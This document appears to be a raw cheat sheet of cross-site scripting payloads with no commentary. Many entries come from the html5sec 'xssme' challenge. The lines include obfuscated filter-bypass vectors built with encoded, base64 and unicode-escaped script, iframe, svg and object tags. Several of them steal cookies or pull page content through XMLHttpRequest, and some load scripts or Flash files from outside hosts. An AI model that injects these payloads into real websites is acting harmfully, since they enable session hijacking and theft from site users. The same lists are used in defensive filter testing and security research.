<video+onerror='javascript:MouseEvent=function+MouseEvent(){};test=new+MouseEvent();test.isTrusted=true;test.type=%22click%22;document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());};document.getElementById(%22safe123%22).click(test);'><source>%23 | |
<script for=document event=onreadystatechange>getElementById('safe123').click()</script> | |
<script> var+x+=+showModelessDialog+(this); alert(x.document.cookie); </script> | |
<script> location.href = 'data:text/html;base64,PHNjcmlwdD54PW5ldyBYTUxIdHRwUmVxdWVzdCgpO3gub3BlbigiR0VUIiwiaHR0cDovL3hzc21lLmh0bWw1c2VjLm9yZy94c3NtZTIvIix0cnVlKTt4Lm9ubG9hZD1mdW5jdGlvbigpIHsgYWxlcnQoeC5yZXNwb25zZVRleHQubWF0Y2goL2RvY3VtZW50LmNvb2tpZSA9ICcoLio/KScvKVsxXSl9O3guc2VuZChudWxsKTs8L3NjcmlwdD4='; </script> | |
<iframe src=%22404%22 onload=%22frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22content.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22self.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<iframe src=%22404%22 onload=%22top.frames[0].document.write(%26quot;<script>r=new XMLHttpRequest();r.open('GET','http://xssme.html5sec.org/xssme2',false);r.send(null);if(r.status==200){alert(r.responseText.substr(150,41));}<\/script>%26quot;)%22></iframe> | |
<script>var x = safe123.onclick;safe123.onclick = function(event) {var f = false;var o = { isTrusted: true };var a = [event, o, event];var get;event.__defineGetter__('type', function() {get = arguments.callee.caller.arguments.callee;return 'click';});var _alert = alert;alert = function() { alert = _alert };x.apply(null, a);(function() {arguments.__defineGetter__('0', function() { return a.pop(); });alert(get());})();};safe123.click();</script># | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<textarea id=ta onfocus=console.dir(event.currentTarget.ownerDocument.location.href=%26quot;javascript:\%26quot;%26lt;script%26gt;var%2520xhr%2520%253D%2520new%2520XMLHttpRequest()%253Bxhr.open('GET'%252C%2520'http%253A%252F%252Fhtml5sec.org%252Fxssme2'%252C%2520true)%253Bxhr.onload%2520%253D%2520function()%2520%257B%2520alert(xhr.responseText.match(%252Fcookie%2520%253D%2520'(.*%253F)'%252F)%255B1%255D)%2520%257D%253Bxhr.send()%253B%26lt;\/script%26gt;\%26quot;%26quot;) autofocus></textarea> | |
<iframe onload=%22write('<script>'%2Blocation.hash.substr(1)%2B'</script>')%22></iframe>#var xhr = new XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta></textarea><script>ta.appendChild(safe123.parentNode.previousSibling.previousSibling.childNodes[3].firstChild.cloneNode(true));alert(ta.value.match(/cookie = '(.*?)'/)[1])</script> | |
<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe id=iframe src=%22javascript:parent.x(window)%22><iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
<textarea id=ta onfocus=%22write('<script>alert(1)</script>')%22 autofocus></textarea> | |
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22> | |
<script>function x(window) { eval(location.hash.substr(1)) }; open(%22javascript:opener.x(window)%22)</script>#var xhr = new window.XMLHttpRequest();xhr.open('GET', 'http://xssme.html5sec.org/xssme2', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
%3Cscript%3Exhr=new%20ActiveXObject%28%22Msxml2.XMLHTTP%22%29;xhr.open%28%22GET%22,%22/xssme2%22,true%29;xhr.onreadystatechange=function%28%29{if%28xhr.readyState==4%26%26xhr.status==200%29{alert%28xhr.responseText.match%28/%27%28[^%27]%2b%29/%29[1]%29}};xhr.send%28%29;%3C/script%3E | |
<iframe src=`http://xssme.html5sec.org/?xss=<iframe onload=%22xhr=new XMLHttpRequest();xhr.open('GET','http://html5sec.org/xssme2',true);xhr.onreadystatechange=function(){if(xhr.readyState==4%26%26xhr.status==200){alert(xhr.responseText.match(/'([^']%2b)/)[1])}};xhr.send();%22>`> | |
<a target="x" href="xssme?xss=%3Cscript%3EaddEventListener%28%22DOMFrameContentLoaded%22,%20function%28e%29%20{e.stopPropagation%28%29;},%20true%29;%3C/script%3E%3Ciframe%20src=%22data:text/html,%253cscript%253eObject.defineProperty%28top,%20%27MyEvent%27,%20{value:%20Object,%20configurable:%20true}%29;function%20y%28%29%20{alert%28top.Safe.get%28%29%29;};event%20=%20new%20Object%28%29;event.type%20=%20%27click%27;event.isTrusted%20=%20true;y%28event%29;%253c/script%253e%22%3E%3C/iframe%3E | |
<a target="x" href="xssme?xss=<script>var cl=Components;var fcc=String.fromCharCode;doc=cl.lookupMethod(top, fcc(100,111,99,117,109,101,110,116) )( );cl.lookupMethod(doc,fcc(119,114,105,116,101))(doc.location.hash)</script>#<iframe src=data:text/html;base64,PHNjcmlwdD5ldmFsKGF0b2IobmFtZSkpPC9zY3JpcHQ%2b name=ZG9jPUNvbXBvbmVudHMubG9va3VwTWV0aG9kKHRvcC50b3AsJ2RvY3VtZW50JykoKTt2YXIgZmlyZU9uVGhpcyA9ICBkb2MuZ2V0RWxlbWVudEJ5SWQoJ3NhZmUxMjMnKTt2YXIgZXZPYmogPSBkb2N1bWVudC5jcmVhdGVFdmVudCgnTW91c2VFdmVudHMnKTtldk9iai5pbml0TW91c2VFdmVudCggJ2NsaWNrJywgdHJ1ZSwgdHJ1ZSwgd2luZG93LCAxLCAxMiwgMzQ1LCA3LCAyMjAsIGZhbHNlLCBmYWxzZSwgdHJ1ZSwgZmFsc2UsIDAsIG51bGwgKTtldk9iai5fX2RlZmluZUdldHRlcl9fKCdpc1RydXN0ZWQnLGZ1bmN0aW9uKCl7cmV0dXJuIHRydWV9KTtmdW5jdGlvbiB4eChjKXtyZXR1cm4gdG9wLlNhZmUuZ2V0KCl9O2FsZXJ0KHh4KGV2T2JqKSk></iframe> | |
<a target="x" href="xssme?xss=<script>find('cookie'); var doc = getSelection().getRangeAt(0).startContainer.ownerDocument; console.log(doc); var xpe = new XPathEvaluator(); var nsResolver = xpe.createNSResolver(doc); var result = xpe.evaluate('//script/text()', doc, nsResolver, 0, null); alert(result.iterateNext().data.match(/cookie = '(.*?)'/)[1])</script> | |
<a target="x" href="xssme?xss=<script>function x(window) { eval(location.hash.substr(1)) }</script><iframe src=%22javascript:parent.x(window);%22></iframe>#var xhr = new window.XMLHttpRequest();xhr.open('GET', '.', true);xhr.onload = function() { alert(xhr.responseText.match(/cookie = '(.*?)'/)[1]) };xhr.send(); | |
Garethy Salty Method!<script>alert(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(Components.lookupMethod(this,'window')(),'document')(), 'getElementsByTagName')('html')[0],'innerHTML')().match(/d.*'/));</script> | |
<a href="javascript:\u0061le%72t(1)"><button> | |
<div onmouseover='alert(1)'>DIV</div> | |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |
<a href="jAvAsCrIpT:alert(1)">X</a> | |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> ? | |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">? | |
<var onmouseover="prompt(1)">On Mouse Over</var>? | |
<a href=javascript:alert(document.cookie)>Click Here</a> | |
<img src="/" =_=" title="onerror='prompt(1)'"> | |
<%<!--'%><script>alert(1);</script --> | |
<script src="data:text/javascript,alert(1)"></script> | |
<iframe/src \/\/onload = prompt(1) | |
<iframe/onreadystatechange=alert(1) | |
<svg/onload=alert(1) | |
<input value=<><iframe/src=javascript:confirm(1) | |
<input type="text" value=``<div/onmouseover='alert(1)'>X</div> | |
http://www.<script>alert(1)</script .com | |
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															%28
																1
																	%29></iframe> ? | |
<svg><script ?>alert(1) | |
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |
<img src=`xx:xx`onerror=alert(1)> | |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/>? | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>? | |
<svg contentScriptType=text/vbs><script>MsgBox+1 | |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script ???????????? | |
<object data=javascript:\u0061le%72t(1)> | |
<script>+-+-1-+-+alert(1)</script> | |
<body/onload=<!-->
alert(1)> | |
<script itworksinallbrowsers>/*<script* */alert(1)</script ? | |
<img src ?itworksonchrome?\/onerror = alert(1)??? | |
<svg><script>//
confirm(1);</script </svg> | |
<svg><script onlypossibleinopera:-)> alert(1) | |
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |
<script x> alert(1) </script 1=2 | |
<div/onmouseover='alert(1)'> style="x:"> | |
<--`<img/src=` onerror=alert(1)> --!> | |
<script/src=data:text/javascript,alert(1)></script> ? | |
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>? | |
"><img src=x onerror=window.open('https://www.google.com/');> | |
<form><button formaction=javascript:alert(1)>CLICKME | |
<math><a xlink:href="//jsfiddle.net/t846h/">click | |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>? | |
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |
"><img src=x onerror=prompt(1);> | |